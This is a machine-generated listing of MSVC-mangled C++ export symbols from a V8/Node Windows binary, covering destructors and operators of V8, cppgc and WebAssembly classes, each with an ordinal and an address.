                                                                                                                                                                                                        ??1ExternalSourceStream@ScriptCompiler@v8@@UEAA@XZ13390x140078990
                                                                                                                                                                                                        ??1ExternalStringResource@String@v8@@UEAA@XZ13400x140078990
                                                                                                                                                                                                        ??1ExternalStringResourceBase@String@v8@@UEAA@XZ13410x140078990
                                                                                                                                                                                                        ??1FeedbackVectorSpec@internal@v8@@QEAA@XZ13420x14047dda0
                                                                                                                                                                                                        ??1FlatStringReader@internal@v8@@UEAA@XZ13430x14047ddc0
                                                                                                                                                                                                        ??1FrameSummary@internal@v8@@QEAA@XZ13440x140a20280
                                                                                                                                                                                                        ??1FreeListMany@internal@v8@@UEAA@XZ13450x1409cc800
                                                                                                                                                                                                        ??1FreeListManyCached@internal@v8@@UEAA@XZ13460x14047dde0
                                                                                                                                                                                                        ??1FreeListManyCachedFastPath@internal@v8@@UEAA@XZ13470x14047dde0
                                                                                                                                                                                                        ??1FreeListManyCachedOrigin@internal@v8@@UEAA@XZ13480x14047dde0
                                                                                                                                                                                                        ??1FunctionData@Coverage@debug@v8@@QEAA@XZ13490x14047db00
                                                                                                                                                                                                        ??1GCInfoTable@internal@cppgc@@QEAA@XZ13500x1404663d0
                                                                                                                                                                                                        ??1GCInvoker@internal@cppgc@@QEAA@XZ13510x140465ca0
                                                                                                                                                                                                        ??1GCTracer@internal@v8@@QEAA@XZ13520x140952610
                                                                                                                                                                                                        ??1GlobalHandles@internal@v8@@QEAA@XZ13530x1409f5320
                                                                                                                                                                                                        ??1Graph@compiler@internal@v8@@QEAA@XZ13540x140ea42b0
                                                                                                                                                                                                        ??1GraphAssembler@compiler@internal@v8@@UEAA@XZ13550x140f585d0
                                                                                                                                                                                                        ??1GraphReducer@compiler@internal@v8@@UEAA@XZ13560x140f36ff0
                                                                                                                                                                                                        ??1GraphTrimmer@compiler@internal@v8@@QEAA@XZ13570x1404bad50
                                                                                                                                                                                                        ??1HandleScope@v8@@QEAA@XZ13580x140b07590
                                                                                                                                                                                                        ??1HandlerTableBuilder@interpreter@internal@v8@@QEAA@XZ13590x14047dda0
                                                                                                                                                                                                        ??1Heap@cppgc@@UEAA@XZ13600x140078990
                                                                                                                                                                                                        ??1Heap@internal@cppgc@@UEAA@XZ13610x140461e80
                                                                                                                                                                                                        ??1HeapBase@internal@cppgc@@UEAA@XZ13620x1404653d0
                                                                                                                                                                                                        ??1HeapGrowing@internal@cppgc@@QEAA@XZ13630x140464d10
                                                                                                                                                                                                        ??1HeapObjectIterator@internal@v8@@QEAA@XZ13640x1409ae540
                                                                                                                                                                                                        ??1IdentityMapBase@internal@v8@@MEAA@XZ13650x1406b4370
                                                                                                                                                                                                        ??1IncrementalMarking@internal@v8@@QEAA@XZ13660x14047ddf0
                                                                                                                                                                                                        ??1IndexGenerator@internal@v8@@QEAA@XZ13670x14095cba0
                                                                                                                                                                                                        ??1Inspectable@V8InspectorSession@v8_inspector@@UEAA@XZ13680x140078990
                                                                                                                                                                                                        ??1InstantiationResultResolver@wasm@internal@v8@@UEAA@XZ13690x140078990
                                                                                                                                                                                                        ??1InstructionBlock@compiler@internal@v8@@QEAA@XZ13700x1404bab00
                                                                                                                                                                                                        ??1InstructionSelector@compiler@internal@v8@@QEAA@XZ13710x1404c16d0
                                                                                                                                                                                                        ??1InstructionSequence@compiler@internal@v8@@QEAA@XZ13720x1404bab40
                                                                                                                                                                                                        ??1Int64Lowering@compiler@internal@v8@@QEAA@XZ13730x140eeb4c0
                                                                                                                                                                                                        ??1Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@XZ13740x14047df40
                                                                                                                                                                                                        ??1InvalidatedSlotsCleanup@internal@v8@@QEAA@XZ13750x14047dec0
                                                                                                                                                                                                        ??1InvalidatedSlotsFilter@internal@v8@@QEAA@XZ13760x14047ded0
                                                                                                                                                                                                        ??1Isolate@internal@v8@@AEAA@XZ13770x140a0a7b0
                                                                                                                                                                                                        ??1IsolateAllocator@internal@v8@@QEAA@XZ13780x140924ce0
                                                                                                                                                                                                        ??1JSCallReducer@compiler@internal@v8@@UEAA@XZ13790x140f0be70
                                                                                                                                                                                                        ??1JSContextSpecialization@compiler@internal@v8@@UEAA@XZ13800x140078990
                                                                                                                                                                                                        ??1JSCreateLowering@compiler@internal@v8@@UEAA@XZ13810x140078990
                                                                                                                                                                                                        ??1JSGraph@compiler@internal@v8@@QEAA@XZ13820x140ed3530
                                                                                                                                                                                                        ??1JSGraphAssembler@compiler@internal@v8@@UEAA@XZ13830x140eeb5a0
                                                                                                                                                                                                        ??1JSHeapBroker@compiler@internal@v8@@QEAA@XZ13840x140f2e160
                                                                                                                                                                                                        ??1JSHeapCopyReducer@compiler@internal@v8@@UEAA@XZ13850x140078990
                                                                                                                                                                                                        ??1JSIntrinsicLowering@compiler@internal@v8@@UEAA@XZ13860x140078990
                                                                                                                                                                                                        ??1JSNativeContextSpecialization@compiler@internal@v8@@UEAA@XZ13870x140078990
                                                                                                                                                                                                        ??1JSToWasmWrapperCompilationUnit@wasm@internal@v8@@QEAA@XZ13880x1405bf7f0
                                                                                                                                                                                                        ??1JSTypedLowering@compiler@internal@v8@@UEAA@XZ13890x140078990
                                                                                                                                                                                                        ??1JumpTableAssembler@wasm@internal@v8@@UEAA@XZ13900x14049b6e0
                                                                                                                                                                                                        ??1LargeObjectSpace@internal@v8@@UEAA@XZ13910x14047dee0
                                                                                                                                                                                                        ??1LargePage@internal@cppgc@@AEAA@XZ13920x140078990
                                                                                                                                                                                                        ??1LargePageMemoryRegion@internal@cppgc@@UEAA@XZ13930x1404584b0
                                                                                                                                                                                                        ??1LargePageSpace@internal@cppgc@@QEAA@XZ13940x14044f770
                                                                                                                                                                                                        ??1LazilyGeneratedNames@wasm@internal@v8@@QEAA@XZ13950x14047df20
                                                                                                                                                                                                        ??1LazyCompileDispatcher@internal@v8@@QEAA@XZ13960x140a7b780
                                                                                                                                                                                                        ??1LoadElimination@compiler@internal@v8@@UEAA@XZ13970x1404bad50
                                                                                                                                                                                                        ??1Local@MarkingWorklists@internal@v8@@QEAA@XZ13980x1409761f0
                                                                                                                                                                                                        ??1LocalDeclEncoder@wasm@internal@v8@@QEAA@XZ13990x14047e1b0
                                                                                                                                                                                                        ??1LocalEmbedderHeapTracer@internal@v8@@QEAA@XZ14000x140952690
                                                                                                                                                                                                        ??1LocalHeap@internal@v8@@QEAA@XZ14010x1409a33d0
                                                                                                                                                                                                        ??1LocalIsolate@internal@v8@@QEAA@XZ14020x140a084f0
                                                                                                                                                                                                        ??1Locker@v8@@QEAA@XZ14030x1409ffdd0
                                                                                                                                                                                                        ??1LoopBuilder@interpreter@internal@v8@@UEAA@XZ14040x1408f2e50
                                                                                                                                                                                                        ??1LoopInfo@compiler@internal@v8@@QEAA@XZ14050x1404afbf0
                                                                                                                                                                                                        ??1MachineGraph@compiler@internal@v8@@QEAA@XZ14060x140ed3530
                                                                                                                                                                                                        ??1MachineOperatorReducer@compiler@internal@v8@@UEAA@XZ14070x141044930
                                                                                                                                                                                                        ??1MacroAssembler@internal@v8@@UEAA@XZ14080x14049b6e0
                                                                                                                                                                                                        ??1Marker@internal@cppgc@@UEAA@XZ14090x14044f780
                                                                                                                                                                                                        ??1MarkerBase@internal@cppgc@@UEAA@XZ14100x14045d4f0
                                                                                                                                                                                                        ??1MarkingVerifier@internal@cppgc@@UEAA@XZ14110x14045adc0
                                                                                                                                                                                                        ??1MarkingVerifierBase@internal@cppgc@@UEAA@XZ14120x14045adc0
                                                                                                                                                                                                        ??1MarkingVisitorBase@internal@cppgc@@UEAA@XZ14130x140078990
                                                                                                                                                                                                        ??1MarkingWorklists@internal@v8@@QEAA@XZ14140x140976230
                                                                                                                                                                                                        ??1MeasureMemoryDelegate@internal@v8@@UEAA@XZ14150x140970f20
                                                                                                                                                                                                        ??1MeasureMemoryDelegate@v8@@UEAA@XZ14160x140078990
                                                                                                                                                                                                        ??1MemoryMappedFile@OS@base@v8@@UEAA@XZ14170x140078990
                                                                                                                                                                                                        ??1MemoryReducer@internal@v8@@QEAA@XZ14180x14047db00
                                                                                                                                                                                                        ??1MicrotaskQueue@internal@v8@@UEAA@XZ14190x140a02c00
                                                                                                                                                                                                        ??1MicrotaskQueue@v8@@UEAA@XZ14200x140078990
                                                                                                                                                                                                        ??1MicrotasksScope@v8@@QEAA@XZ14210x140b075d0
                                                                                                                                                                                                        ??1MoveOptimizer@compiler@internal@v8@@QEAA@XZ14220x140f0bea0
                                                                                                                                                                                                        ??1MultiIsolatePlatform@node@@UEAA@XZ14230x140078990
                                                                                                                                                                                                        ??1MutatorMarkingVisitor@internal@cppgc@@UEAA@XZ14240x140078990
                                                                                                                                                                                                        ??1MutatorUnifiedHeapMarkingVisitor@internal@v8@@UEAA@XZ14250x140078990
                                                                                                                                                                                                        ??1Mutex@base@v8@@QEAA@XZ14260x140078990
                                                                                                                                                                                                        ??1NameConverter@disasm@@UEAA@XZ14270x140078990
                                                                                                                                                                                                        ??1NameProvider@cppgc@@UEAA@XZ14280x140078990
                                                                                                                                                                                                        ??1NativeContextStats@internal@v8@@QEAA@XZ14290x14047df40
                                                                                                                                                                                                        ??1NativeModule@wasm@internal@v8@@QEAA@XZ14300x1405667d0
                                                                                                                                                                                                        ??1NativeModuleDeserializer@wasm@internal@v8@@QEAA@XZ14310x140527fa0
                                                                                                                                                                                                        ??1NewSpace@internal@v8@@UEAA@XZ14320x14047df50
                                                                                                                                                                                                        ??1NoDumpOnJavascriptExecution@internal@v8@@QEAA@XZ14330x140a7d950
                                                                                                                                                                                                        ??1NoGarbageCollectionScope@subtle@cppgc@@QEAA@XZ14340x140465010
                                                                                                                                                                                                        ??1NoThrowOnJavascriptExecution@internal@v8@@QEAA@XZ14350x140a7d960
                                                                                                                                                                                                        ??1NodeOriginTable@compiler@internal@v8@@QEAA@XZ14360x140eeb5b0
                                                                                                                                                                                                        ??1NormalPage@internal@cppgc@@AEAA@XZ14370x140078990
                                                                                                                                                                                                        ??1NormalPageMemoryPool@internal@cppgc@@QEAA@XZ14380x1404584e0
                                                                                                                                                                                                        ??1NormalPageMemoryRegion@internal@cppgc@@UEAA@XZ14390x1404584b0
                                                                                                                                                                                                        ??1NormalPageSpace@internal@cppgc@@QEAA@XZ14400x14044f770
                                                                                                                                                                                                        ??1OFStream@internal@v8@@UEAA@XZ14410x14047e010
                                                                                                                                                                                                        ??1OFStreamBase@internal@v8@@UEAA@XZ14420x1400f0020
                                                                                                                                                                                                        ??1ObjectIterator@internal@v8@@UEAA@XZ14430x140078990
                                                                                                                                                                                                        ??1OperationsBarrier@internal@v8@@QEAA@XZ14440x14047e0a0
                                                                                                                                                                                                        ??1Operator@compiler@internal@v8@@UEAA@XZ14450x140078990
                                                                                                                                                                                                        ??1OptimizedCompilationInfo@internal@v8@@QEAA@XZ14460x140a82640
                                                                                                                                                                                                        ??1OptimizingCompileDispatcher@internal@v8@@QEAA@XZ14470x140a7a730
                                                                                                                                                                                                        ??1OutputStream@v8@@UEAA@XZ14480x140078990
                                                                                                                                                                                                        ??1OverrideEmbedderStackStateScope@testing@cppgc@@QEAA@XZ14490x140451750
                                                                                                                                                                                                        ??1PageAllocator@base@v8@@UEAA@XZ14500x140078990
                                                                                                                                                                                                        ??1PageBackend@internal@cppgc@@QEAA@XZ14510x140458570
                                                                                                                                                                                                        ??1PageMemoryRegion@internal@cppgc@@UEAA@XZ14520x1404584b0
                                                                                                                                                                                                        ??1PageMemoryRegionTree@internal@cppgc@@QEAA@XZ14530x1404585b0
                                                                                                                                                                                                        ??1PagedSpace@internal@v8@@UEAA@XZ14540x14047e0c0
                                                                                                                                                                                                        ??1PagedSpaceObjectIterator@internal@v8@@UEAA@XZ14550x140078990
                                                                                                                                                                                                        ??1ParallelMove@compiler@internal@v8@@QEAA@XZ14560x14047dda0
                                                                                                                                                                                                        ??1ParseInfo@internal@v8@@QEAA@XZ14570x1407b24c0
                                                                                                                                                                                                        ??1Parser@internal@v8@@QEAA@XZ14580x1407733a0
                                                                                                                                                                                                        ??1PauseAllocationObserversScope@internal@v8@@QEAA@XZ14590x1409f3540
                                                                                                                                                                                                        ??1PersistentHandleVisitor@v8@@UEAA@XZ14600x140078990
                                                                                                                                                                                                        ??1PersistentHandles@internal@v8@@QEAA@XZ14610x1409f3d60
                                                                                                                                                                                                        ??1PersistentHandlesScope@internal@v8@@QEAA@XZ14620x1409f3e30
                                                                                                                                                                                                        ??1PersistentRegion@internal@cppgc@@QEAA@XZ14630x140457780
                                                                                                                                                                                                        ??1PersistentRegionLock@internal@cppgc@@QEAA@XZ14640x1404577a0
                                                                                                                                                                                                        ??1PhiInstruction@compiler@internal@v8@@QEAA@XZ14650x1404bad50
                                                                                                                                                                                                        ??1Platform@cppgc@@UEAA@XZ14660x140078990
                                                                                                                                                                                                        ??1PreparseDataBuilder@internal@v8@@QEAA@XZ14670x140078990
                                                                                                                                                                                                        ??1ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAA@XZ14680x1409e5fa0
                                                                                                                                                                                                        ??1ProfileNode@internal@v8@@QEAA@XZ14690x14074d0e0
                                                                                                                                                                                                        ??1ProfileTree@internal@v8@@QEAA@XZ14700x14074d180
                                                                                                                                                                                                        ??1ProfilerCodeObserver@internal@v8@@UEAA@XZ14710x1407450b0
                                                                                                                                                                                                        ??1ProfilerEventsProcessor@internal@v8@@UEAA@XZ14720x140760a80
                                                                                                                                                                                                        ??1ProfilerListener@internal@v8@@UEAA@XZ14730x14074a020
                                                                                                                                                                                                        ??1PropertyDescriptor@v8@@QEAA@XZ14740x140b07620
                                                                                                                                                                                                        ??1PropertyIterator@debug@v8@@UEAA@XZ14750x140078990
                                                                                                                                                                                                        ??1RawHeap@internal@cppgc@@QEAA@XZ14760x140456a50
                                                                                                                                                                                                        ??1RawMachineAssembler@compiler@internal@v8@@QEAA@XZ14770x140f1d240
                                                                                                                                                                                                        ??1RawMachineLabel@compiler@internal@v8@@QEAA@XZ14780x140078990
                                                                                                                                                                                                        ??1ReadOnlySerializer@internal@v8@@UEAA@XZ14790x1406ccc30
                                                                                                                                                                                                        ??1ReadOnlySpace@internal@v8@@UEAA@XZ14800x140962c00
                                                                                                                                                                                                        ??1Recorder@metrics@v8@@UEAA@XZ14810x140078990
                                                                                                                                                                                                        ??1RecursiveMutex@base@v8@@QEAA@XZ14820x1402b0dc0
                                                                                                                                                                                                        ??1Reducer@compiler@internal@v8@@UEAA@XZ14830x140078990
                                                                                                                                                                                                        ??1RedundancyElimination@compiler@internal@v8@@UEAA@XZ14840x14104d5a0
                                                                                                                                                                                                        ??1RegExpBytecodeGenerator@internal@v8@@UEAA@XZ14850x14073c630
                                                                                                                                                                                                        ??1RegExpMacroAssemblerX64@internal@v8@@UEAA@XZ14860x1404aa3e0
                                                                                                                                                                                                        ??1RegionAllocator@base@v8@@QEAA@XZ14870x140e6c860
                                                                                                                                                                                                        ??1RegisterConfiguration@internal@v8@@UEAA@XZ14880x140078990
                                                                                                                                                                                                        ??1RegisterState@v8@@QEAA@XZ14890x140b07630
                                                                                                                                                                                                        ??1RemoteObject@API@Runtime@protocol@v8_inspector@@UEAA@XZ14900x14042e010
                                                                                                                                                                                                        ??1SafeForTerminationScope@Isolate@v8@@QEAA@XZ14910x140b07650
                                                                                                                                                                                                        ??1SafepointScope@internal@v8@@QEAA@XZ14920x140962520
                                                                                                                                                                                                        ??1Sampler@sampler@v8@@UEAA@XZ14930x1408dfdd0
                                                                                                                                                                                                        ??1SamplingEventsProcessor@internal@v8@@UEAA@XZ14940x140760b50
                                                                                                                                                                                                        ??1SaveAndSwitchContext@internal@v8@@QEAA@XZ14950x14047e100
                                                                                                                                                                                                        ??1SaveContext@internal@v8@@QEAA@XZ14960x140a0b080
                                                                                                                                                                                                        ??1Scanner@internal@v8@@QEAA@XZ14970x14047e110
                                                                                                                                                                                                        ??1Schedule@compiler@internal@v8@@QEAA@XZ14980x1404c1830
                                                                                                                                                                                                        ??1ScheduledErrorThrower@wasm@internal@v8@@QEAA@XZ14990x14052b2c0
                                                                                                                                                                                                        ??1Scheduler@compiler@internal@v8@@QEAA@XZ15000x140f0c110
                                                                                                                                                                                                        ??1Scope@GCTracer@internal@v8@@QEAA@XZ15010x1409c8080
                                                                                                                                                                                                        ??1Scope@Isolate@v8@@QEAA@XZ15020x140078f30
                                                                                                                                                                                                        ??1Scope@internal@v8@@QEAA@XZ15030x140078990
                                                                                                                                                                                                        ??1ScopeIterator@debug@v8@@UEAA@XZ15040x140078990
                                                                                                                                                                                                        ??1ScopedExceptionHandler@compiler@internal@v8@@QEAA@XZ15050x140f1d270
                                                                                                                                                                                                        ??1ScriptData@Coverage@debug@v8@@QEAA@XZ15060x14047db00
                                                                                                                                                                                                        ??1ScriptData@TypeProfile@debug@v8@@QEAA@XZ15070x14047db00
                                                                                                                                                                                                        ??1ScriptData@internal@v8@@QEAA@XZ15080x140528000
                                                                                                                                                                                                        ??1SealHandleScope@v8@@QEAA@XZ15090x140b07660
                                                                                                                                                                                                        ??1SearchMatch@API@Debugger@protocol@v8_inspector@@UEAA@XZ15100x14042e010
                                                                                                                                                                                                        ??1Semaphore@base@v8@@QEAA@XZ15110x140e68750
                                                                                                                                                                                                        ??1SetupIsolateDelegate@internal@v8@@UEAA@XZ15120x140078990
                                                                                                                                                                                                        ??1SharedMutex@base@v8@@QEAA@XZ15130x140078990
                                                                                                                                                                                                        ??1SharedTurboAssembler@internal@v8@@UEAA@XZ15140x14049b6e0
                                                                                                                                                                                                        ??1SignatureMap@wasm@internal@v8@@QEAA@XZ15150x14047e1a0
                                                                                                                                                                                                        ??1SimplifiedOperatorReducer@compiler@internal@v8@@UEAA@XZ15160x141074180
                                                                                                                                                                                                        ??1SnapshotCreator@v8@@QEAA@XZ15170x140b07680
                                                                                                                                                                                                        ??1SnapshotData@internal@v8@@UEAA@XZ15180x140528010
                                                                                                                                                                                                        ??1SourceIdAssigner@compiler@internal@v8@@QEAA@XZ15190x140eeb5d0
                                                                                                                                                                                                        ??1SourcePositionTable@compiler@internal@v8@@QEAA@XZ15200x140ea42b0
                                                                                                                                                                                                        ??1SourcePositionTable@internal@v8@@QEAA@XZ15210x1407449e0
                                                                                                                                                                                                        ??1SourcePositionTableBuilder@internal@v8@@QEAA@XZ15220x14047e1b0
                                                                                                                                                                                                        ??1Space@internal@v8@@UEAA@XZ15230x14047e1d0
                                                                                                                                                                                                        ??1SpaceIterator@internal@v8@@UEAA@XZ15240x1409ae5b0
                                                                                                                                                                                                        ??1StackTrace@API@Runtime@protocol@v8_inspector@@UEAA@XZ15250x14042e010
                                                                                                                                                                                                        ??1StackTrace@debug@base@v8@@QEAA@XZ15260x140078990
                                                                                                                                                                                                        ??1StackTraceFrameIterator@internal@v8@@QEAA@XZ15270x140078990
                                                                                                                                                                                                        ??1StackTraceId@API@Runtime@protocol@v8_inspector@@UEAA@XZ15280x14042e010
                                                                                                                                                                                                        ??1StackTraceIterator@debug@v8@@UEAA@XZ15290x140078990
                                                                                                                                                                                                        ??1StartupSerializer@internal@v8@@UEAA@XZ15300x1406c08e0
                                                                                                                                                                                                        ??1StateValuesCache@compiler@internal@v8@@QEAA@XZ15310x140ed3540
                                                                                                                                                                                                        ??1StatsCollector@internal@cppgc@@QEAA@XZ15320x14044f790
                                                                                                                                                                                                        ??1StatsCounterThreadSafe@internal@v8@@QEAA@XZ15330x14047e230
                                                                                                                                                                                                        ??1StatsScope@ZoneStats@compiler@internal@v8@@QEAA@XZ15340x14104c600
                                                                                                                                                                                                        ??1StreamedSource@ScriptCompiler@v8@@QEAA@XZ15350x140b07710
                                                                                                                                                                                                        ??1StreamingDecoder@wasm@internal@v8@@UEAA@XZ15360x1405441d0
                                                                                                                                                                                                        ??1StreamingProcessor@wasm@internal@v8@@UEAA@XZ15370x140078990
                                                                                                                                                                                                        ??1StringBuffer@v8_inspector@@UEAA@XZ15380x140078990
                                                                                                                                                                                                        ??1StringTable@internal@v8@@QEAA@XZ15390x1407ca630
                                                                                                                                                                                                        ??1StringsStorage@internal@v8@@QEAA@XZ15400x140746340
                                                                                                                                                                                                        ??1SuppressMicrotaskExecutionScope@Isolate@v8@@QEAA@XZ15410x140b07740
                                                                                                                                                                                                        ??1Sweeper@internal@cppgc@@QEAA@XZ15420x140453390
                                                                                                                                                                                                        ??1SwitchBuilder@interpreter@internal@v8@@UEAA@XZ15430x1408f2e80
                                                                                                                                                                                                        ??1SyncStreamingDecoder@wasm@internal@v8@@UEAA@XZ15440x140570950
                                                                                                                                                                                                        ??1Thread@base@v8@@UEAA@XZ15450x140e5f6c0
                                                                                                                                                                                                        ??1ThrowOnJavascriptExecution@internal@v8@@QEAA@XZ15460x140a7d960
                                                                                                                                                                                                        ??1TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@UEAA@XZ15470x140078990
                                                                                                                                                                                                        ??1TracedValue@tracing@v8@@UEAA@XZ15480x1406b6870
                                                                                                                                                                                                        ??1TryCatch@v8@@QEAA@XZ15490x140b07760
                                                                                                                                                                                                        ??1TryCatchBuilder@interpreter@internal@v8@@UEAA@XZ15500x1408f2ec0
                                                                                                                                                                                                        ??1TryFinallyBuilder@interpreter@internal@v8@@UEAA@XZ15510x1408f2f10
                                                                                                                                                                                                        ??1TurboAssembler@internal@v8@@UEAA@XZ15520x14049b6e0
                                                                                                                                                                                                        ??1TurboAssemblerBase@internal@v8@@UEAA@XZ15530x14049b6e0
                                                                                                                                                                                                        ??1TypeCache@compiler@internal@v8@@QEAA@XZ15540x140fd3fc0
                                                                                                                                                                                                        ??1TypeNarrowingReducer@compiler@internal@v8@@UEAA@XZ15550x141078320
                                                                                                                                                                                                        ??1TypeProfile@debug@v8@@QEAA@XZ15560x14007c830
                                                                                                                                                                                                        ??1TypedOptimization@compiler@internal@v8@@UEAA@XZ15570x141079370
                                                                                                                                                                                                        ??1TypedSlotSet@internal@v8@@UEAA@XZ15580x14047e240
                                                                                                                                                                                                        ??1TypedSlots@internal@v8@@UEAA@XZ15590x140956f10
                                                                                                                                                                                                        ??1Typer@compiler@internal@v8@@QEAA@XZ15600x14107cb80
                                                                                                                                                                                                        ??1UnifiedHeapMarkingVerifier@internal@v8@@UEAA@XZ15610x14045adc0
                                                                                                                                                                                                        ??1UnifiedHeapMarkingVisitorBase@internal@v8@@UEAA@XZ15620x140078990
                                                                                                                                                                                                        ??1Unlocker@v8@@QEAA@XZ15630x1409ffec0
                                                                                                                                                                                                        ??1UnoptimizedCompilationInfo@internal@v8@@QEAA@XZ15640x140641180
                                                                                                                                                                                                        ??1UnoptimizedCompileState@internal@v8@@QEAA@XZ15650x14047e250
                                                                                                                                                                                                        ??1Utf8Value@String@v8@@QEAA@XZ15660x140b078c0
                                                                                                                                                                                                        ??1V8HeapExplorer@internal@v8@@UEAA@XZ15670x140752440
                                                                                                                                                                                                        ??1V8Inspector@v8_inspector@@UEAA@XZ15680x140078990
                                                                                                                                                                                                        ??1V8InspectorClient@v8_inspector@@UEAA@XZ15690x140078990
                                                                                                                                                                                                        ??1V8InspectorSession@v8_inspector@@UEAA@XZ15700x140078990
                                                                                                                                                                                                        ??1V8StackTrace@v8_inspector@@UEAA@XZ15710x140078990
                                                                                                                                                                                                        ??1Value@String@v8@@QEAA@XZ15720x140b078c0
                                                                                                                                                                                                        ??1ValueDeserializer@v8@@QEAA@XZ15730x140b078d0
                                                                                                                                                                                                        ??1ValueNumberingReducer@compiler@internal@v8@@UEAA@XZ15740x1410849f0
                                                                                                                                                                                                        ??1ValueSerializer@v8@@QEAA@XZ15750x140b07900
                                                                                                                                                                                                        ??1VirtualMemory@internal@cppgc@@QEAA@XZ15760x140451530
                                                                                                                                                                                                        ??1VirtualMemory@internal@v8@@QEAA@XZ15770x1406b52f0
                                                                                                                                                                                                        ??1Visitor@cppgc@@UEAA@XZ15780x140078990
                                                                                                                                                                                                        ??1WasmCode@wasm@internal@v8@@QEAA@XZ15790x140566a10
                                                                                                                                                                                                        ??1WasmCodeManager@wasm@internal@v8@@QEAA@XZ15800x140566b30
                                                                                                                                                                                                        ??1WasmCodeRefScope@wasm@internal@v8@@QEAA@XZ15810x140566bb0
                                                                                                                                                                                                        ??1WasmEngine@wasm@internal@v8@@QEAA@XZ15820x140554230
                                                                                                                                                                                                        ??1WasmError@wasm@internal@v8@@QEAA@XZ15830x140528030
                                                                                                                                                                                                        ??1WasmFunctionBuilder@wasm@internal@v8@@QEAA@XZ15840x14053e090
                                                                                                                                                                                                        ??1WasmGraphBuilder@compiler@internal@v8@@QEAA@XZ15850x140eeb680
                                                                                                                                                                                                        ??1WasmModule@wasm@internal@v8@@QEAA@XZ15860x1405388b0
                                                                                                                                                                                                        ??1WasmModuleBuilder@wasm@internal@v8@@QEAA@XZ15870x14053e150
                                                                                                                                                                                                        ??1WasmModuleObjectBuilderStreaming@v8@@QEAA@XZ15880x140079540
                                                                                                                                                                                                        ??1WasmModuleSourceMap@wasm@internal@v8@@QEAA@XZ15890x14047e2e0
                                                                                                                                                                                                        ??1WasmSerializer@wasm@internal@v8@@QEAA@XZ15900x140528090
                                                                                                                                                                                                        ??1WasmStreaming@v8@@QEAA@XZ15910x140544260
                                                                                                                                                                                                        ??1WeakCodeRegistry@internal@v8@@QEAA@XZ15920x1407449f0
                                                                                                                                                                                                        ??1WebSnapshotDeserializer@internal@v8@@QEAA@XZ15930x1406ac4c0
                                                                                                                                                                                                        ??1WebSnapshotSerializer@internal@v8@@QEAA@XZ15940x1406ac500
                                                                                                                                                                                                        ??1Zone@internal@v8@@QEAA@XZ15950x1406abc50
                                                                                                                                                                                                        ??1ZoneStats@compiler@internal@v8@@QEAA@XZ15960x14104c670
                                                                                                                                                                                                        ??2AlignedSlotAllocator@internal@v8@@CAPEAX_K@Z15970x14044f810
                                                                                                                                                                                                        ??2ErrorThrower@wasm@internal@v8@@CAPEAX_K@Z15980x14044f810
                                                                                                                                                                                                        ??2EscapableHandleScope@v8@@CAPEAX_K@Z15990x14044f810
                                                                                                                                                                                                        ??2GlobalGCInfoTable@internal@cppgc@@CAPEAX_K@Z16000x14044f810
                                                                                                                                                                                                        ??2HandleScope@v8@@CAPEAX_K@Z16010x14044f810
                                                                                                                                                                                                        ??2Isolate@internal@v8@@CAPEAX_KPEAX@Z16020x140078920
                                                                                                                                                                                                        ??2Malloced@internal@v8@@SAPEAX_K@Z16030x1406b5400
                                                                                                                                                                                                        ??2Node@compiler@internal@v8@@CAPEAX_KPEAX@Z16040x140078920
                                                                                                                                                                                                        ??2Register@interpreter@internal@v8@@CAPEAX_K@Z16050x14044f810
                                                                                                                                                                                                        ??2SamplingEventsProcessor@internal@v8@@SAPEAX_K@Z16060x140760ba0
                                                                                                                                                                                                        ??2SealHandleScope@v8@@CAPEAX_K@Z16070x14044f810
                                                                                                                                                                                                        ??2TryCatch@v8@@CAPEAX_K@Z16080x14044f810
                                                                                                                                                                                                        ??3AlignedSlotAllocator@internal@v8@@CAXPEAX_K@Z16090x14044f810
                                                                                                                                                                                                        ??3BackingStore@v8@@SAXPEAX@Z16100x140078cf0
                                                                                                                                                                                                        ??3CompilationState@wasm@internal@v8@@SAXPEAX@Z16110x140078cf0
                                                                                                                                                                                                        ??3ErrorThrower@wasm@internal@v8@@CAXPEAX_K@Z16120x14044f810
                                                                                                                                                                                                        ??3EscapableHandleScope@v8@@CAXPEAX_K@Z16130x14044f810
                                                                                                                                                                                                        ??3GlobalGCInfoTable@internal@cppgc@@CAXPEAX_K@Z16140x14044f810
                                                                                                                                                                                                        ??3HandleScope@v8@@CAXPEAX_K@Z16150x14044f810
                                                                                                                                                                                                        ??3Malloced@internal@v8@@SAXPEAX@Z16160x14020a1c0
                                                                                                                                                                                                        ??3Register@interpreter@internal@v8@@CAXPEAX_K@Z16170x14044f810
                                                                                                                                                                                                        ??3SamplingEventsProcessor@internal@v8@@SAXPEAX@Z16180x140760bb0
                                                                                                                                                                                                        ??3SealHandleScope@v8@@CAXPEAX_K@Z16190x14044f810
                                                                                                                                                                                                        ??3TryCatch@v8@@CAXPEAX_K@Z16200x14044f810
                                                                                                                                                                                                        ??4?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16210x140078b00
                                                                                                                                                                                                        ??4?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16220x140078b00
                                                                                                                                                                                                        ??4?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16230x140078b00
                                                                                                                                                                                                        ??4?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16240x140078b00
                                                                                                                                                                                                        ??4?$BaseShape@I@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16250x140078ac0
                                                                                                                                                                                                        ??4?$BaseShape@I@internal@v8@@QEAAAEAV012@AEBV012@@Z16260x140078ac0
                                                                                                                                                                                                        ??4?$BaseShape@PEAVHashTableKey@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16270x140078ac0
                                                                                                                                                                                                        ??4?$BaseShape@PEAVHashTableKey@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16280x140078ac0
                                                                                                                                                                                                        ??4?$BaseShape@V?$Handle@VName@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16290x140078ac0
                                                                                                                                                                                                        ??4?$BaseShape@V?$Handle@VName@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16300x140078ac0
